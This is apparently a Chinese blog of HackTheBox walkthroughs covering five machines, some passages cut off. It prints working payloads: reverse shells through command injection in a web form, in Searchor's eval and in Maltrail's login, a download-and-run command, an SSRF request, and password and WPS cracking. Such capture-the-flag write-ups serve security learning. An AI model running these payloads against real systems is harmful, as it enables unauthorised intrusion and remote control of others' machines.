渗透测试

User Flag nmap 10.10.11.242 -A 开放了了22和80端口，根据提示添加个配置： echo "10.10.11.242 devvortex.htb" | sudo tee -a /etc/hosts 访问web： 看了一圈，没发现什么特征，网站也没什么功能点，还尝试了爆破常见目录、JS找敏感路径，无果。 这里卡了很久，逃课看了一下一步，居然是爆破子域名，而且要用到vhost爆破： gobuster vhost -u http://devvortex.htb/ -w /Users/fox09/Downloads/subdomains-top1million-5000.txt --append-domain 查了一下，有别于DNS爆破的直接向DNS服务器通信，vhost爆破是通过HTTP请求不同的子域名，再根据响应判断子域名是否存在。 我分别尝试了dns模式和vhost模式： 可以看到只有vhost模式能爆破出dev.devvortex.htb。 但我有点纳闷，/etc/hosts都是我自己配置的，这个子域名并不在配置中，对它进行请求，不也需要先经过DNS服务器查询到相应的IP后才能进行通信吗？ 我在hackthebox官方论坛上也看到其他人有着同样的疑惑： I am somewhat confused on enumerating domains. You always have to define any htb domains you find manually in your /etc/hosts file so how exactly does enumerating domains work with an htb box? Great question. Answer is virtual hosts. 有人这样回复： Simplified explanation: Virtual hosts are another website hosted on the same server as the main site....

User Flag 常规nmap起手： 扫出ftp匿名访问，还有几个可疑的文件。登陆进去下下来看看： 其中backup-OpenWrt-2023-07-26.tar解压后得到一个名为etc的文件夹，看来就是这个系统的etc文件夹备份，看看/etc/passwd文件： 至少得到了一个名为netadmin的用户，还不差。 在这卡了一会，经过一番搜寻，最终在一个名字为wireless的文件中找到了有趣的东西： VeRyUniUgWiFIPasswrd1! 一个密码。尝试用netadmin结合这个密码登陆ssh： 轻松～ System Flag 一顿常规提权操作未果后，我不禁开始思考：靶机名叫Wifinetic，备份文件叫OpenWrt，密码是VeRyUniUgWiFIPasswrd1!，也许该到Wi-Fi登场了。 仔细看了一下linpeas跑出来的结果： hostapd.conf是一个配置文件，用于设置Linux系统上的一个带加密功能的无线接入点（access point : AP）程序hostapd。hostapd能够使得无线网卡切换为master模式，模拟AP（路由器）功能，作为AP的认证服务器，负责控制管理stations的接入和认证。 喝喝，这我太熟了，况且系统还自带了一个工具，reaver： 它是用来破解WPS密码的工具，到这里几乎可以判断作者的意图了。现在只需要找到AP，并破解它的密码。 使用iwconfig查看无线网络信息： Access Point: 02:00:00:00:00:00，这是AP的BSSID。其中mon0的模式为Monitor，也就是监听模式，所以需要用它来进行破解。 最后使用reaver进行破解： 得到密码，使用root用户登陆后即可拿到flag。（没截图，写文章的时候机器已经不免费了😭）

User Flag 常规nmap起手： nmap -A 10.10.11.230 在/etc/hosts中添加： 10.10.11.230 cozyhosting.htb 即可正常访问网页： 看了一圈，先搜了Bootstrap相关漏洞，只找到存在XSS；登陆框尝试了常见弱口令和SQL注入，也没啥收获。 只能爆目录试试看： dirsearch -u http://cozyhosting.htb/ 居然存在Spring Boot未授权，先访问http://cozyhosting.htb/actuator/看看： 对照Spring Boot Vulnerability Exploit Check List，没法直接RCE，甚至连信息泄漏都没有……吗？ 看看http://cozyhosting.htb/actuator/sessions 嗯？有UNAUTHORIZED，也有kanderson。其中有一个UNAUTHORIZED的值和我的cookie一致，或许直接替换cookie？ 之前扫目录还扫到一个admin目录： 直接访问会跳转login目录，现在替换cookie再访问试试： 成功进来了，页面只有一个功能点，分别要求输入Hostname和Username。随便输入点东西试试： ssh: connect to host 10.10.16.6 port 22: Connection timed out，是不是有点眼熟？这不是命令行用ssh连接超时的报错嘛？隐约嗅到命令注入的味道。 经过测试，username字段存在命令注入，nc -lv 9001开启监听，再让username=;echo${IFS}"L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjgvOTAwMSAwPiYx"|base64${IFS}-d|bash;： 成功得到shell～用户为app。美滋滋进/home目录准备拿Flag： 结果发现/home下面只有/josh。无奈只能回到/app下，发现有个cloudhosting-0.0.1.jar，下下来看看： 经过一番搜寻，终于在application.properties中找到了postgresql的信息。由于靶机5432端口并未对外开放，只能在靶机上进行连接： 找到了两个密码的哈希，用hashcat跑一个试试： hashcat -m 3200 hash.txt rockyou.txt 跑出admin对应的密码，尝试用来登陆josh： 成功拿到Flag，真难！ System Flag 一把嗦了，没啥好说的

User Flag 常规nmap起手： nmap -A 10.10.11.208 扫到22和80端口开放，并存在提示：Did not follow redirect to http://searcher.htb。 直接访问http://10.10.11.208:80则跳转到http://searcher.htb： 直接修改hosts文件： 再次访问http://10.10.11.208:80： 看到下方的Powered by Flask and Searchor 2.4.0，Google搜索一下Searchor有什么漏洞，找到了它：GitHub - jonnyzar/POC-Searchor-2.4.2: eval() Exploit POC for Searchor 2.4.2 and lower 本地运行nc： nc -lv 9001 在搜索框输入： ', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.16.3',9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))# 成功弹shell后获得User Flag～ System Flag 用上次做题学到的sudo -l起手试试： 看来行不通，ls -la看看/var/www/app目录下有什么： http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git，一个可疑的链接。 问问ChatGPT： 哦？包含了账号密码？cody:jh1usoih2bkjaspwe92原来是一对账号密码！但有啥用呢，没想明白…… 我在这卡了很久，也用了常见的Linux提权辅助脚本，但并没有什么发现。😭 最终还是回到了sudo -l -S，此时需要输入密码，使用jh1usoih2bkjaspwe92来碰了碰运气： 成啦！svc账号的密码也是jh1usoih2bkjaspwe92。还记得一开始扫描到开放的22端口吗？在后面的操作中可以直接使用ssh连接，得到一个更好的shell。 让我们来看看system-checkup.py是用来干嘛的： 可以看到前两个参数和docker相关，对于解体的作用不详；使用full-checkup参数则报错。 在这又卡了好久，最后切换到/opt/scripts/目录发现在此目录下存在full-checkup.sh，且能正确运行/opt/scripts/system-checkup.py full-checkup： 似乎存在一种可能：full-checkup参数需要调用当前目录下的full-checkup.sh文件。 那么！设full-checkup.sh= #!/bin/bash cat /root/root.txt 再回到/home/svc目录，使用wget http://10.10.16.10:8000/full-checkup.sh，再chmod +x full-checkup.sh，最后sudo /usr/bin/python3 /opt/scripts/system-checkup....

PentestGPT不停地出现在我的GitHub主页流上，我看着它，像极了普通工厂工人看着自动化流水线车间。 怎么办呢？打不过就加入吧！但目前PentestGPT需要ChatGPT-4，我开不起😅 还能怎么办呢？看看演示视频吧。演示者用它来打HackTheBox，看着看着自己也手痒了。之前有注册过HackTheBox账号，但VPN实在太卡了，连最基本的网络连通性都无法保证。要想玩HackTheBox，首先得解决网络问题。 解决网络问题 一图流： 挂个代理就行。openVPN居然还能挂代理 废话不多说，开始做题！ User Flag 连上VPN，先测试一下网络： ping 10.10.11.224 通！而且延迟是68ms，如果不用代理，需要680ms😁 先用nmap探测一下端口信息： nmap 10.10.11.224 -v 22端口和55555端口开放，80端口被过滤。 先看看55555端口是不是web服务： 一开始我在这个简陋的页面转了很久，把能看的地方都看了一遍，仍然没什么收获。因为它太过简陋，让我不敢相信他是一个通用型应用。 直到我换了一个浏览器打开： Chrome在干嘛？？？ 言归正传，Powered by request-baskets，版本是1.2.1，搜索一下它有什么漏洞。 最终我找到了request-baskets SSRF details - CodiMD，一个SSRF。 还记得远处被filtered了的80端口吗？或许可以利用SSRF看看里面究竟有什么： curl --location 'http://10.10.11.224:55555/api/baskets/fox09' --header 'Content-Type: application/json' --data '{"forward_url": "http://127.0.0.1:80/", "proxy_response": true, "insecure_tls": false, "expand_path": true, "capacity": 250}' 再访问http://10.10.11.224:55555/fox09： 嗯～得到了一个Maltrail页面，搜搜它有什么漏洞。 Unauthenticated OS Command Injection in stamparm/maltrail vulnerability found in maltrail，一个没有回显命令执行。 在经过无数失败的反弹shell后，我找到了起作用的方法： curl 'http://10.10.11.224:55555/fox09/login' --data 'username=;`curl 10.10.16.18:8000/rev.sh|bash`' 其中rev.sh的内容为： #/bin/bash bash -i >& /dev/tcp/10....